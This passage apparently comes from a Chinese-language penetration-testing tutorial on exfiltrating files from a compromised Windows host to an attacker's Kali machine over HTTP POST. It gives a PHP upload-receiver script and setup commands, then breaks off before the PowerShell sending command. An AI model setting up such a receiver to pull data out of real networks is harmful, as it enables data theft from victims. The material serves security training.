Windows上传使用Windows脚本语言
在某些情况下,我们可能需要使用Windows客户端从目标网络中泄漏数据。这可能很复杂,因为Windows上默认很少启用标准的TFTP、FTP和HTTP服务器。 幸运的是,如果允许出站HTTP流量,我们可以使用System.Net.WebClient PowerShell类通过HTTP POST请求将数据上传到Kali机器。 为此,我们可以创建以下PHP脚本,并将其保存为upload.php,保存在我们的Kali webroot目录/var/www/html中:
<?php
$uploaddir = '/var/www/uploads/';
$uploadfile = $uploaddir . $_FILES['file']['name'];
move_uploaded_file($_FILES['file']['tmp_name'], $uploadfile)
?>
PHP代码将处理传入的文件上传请求,并将传输的数据保存到/var/www/uploads/目录。
接下来,我们必须创建uploads文件夹并修改其权限,授予www-data用户所有权和随后的写权限:
kali@kali:/var/www$ sudo mkdir /var/www/uploads
kali@kali:/var/www$ ps -ef | grep apache
root 1946 1 0 21:39 ? 00:00:00 /usr/sbin/apache2 -k start
www-data 1947 1946 0 21:39 ? 00:00:00 /usr/sbin/apache2 -k start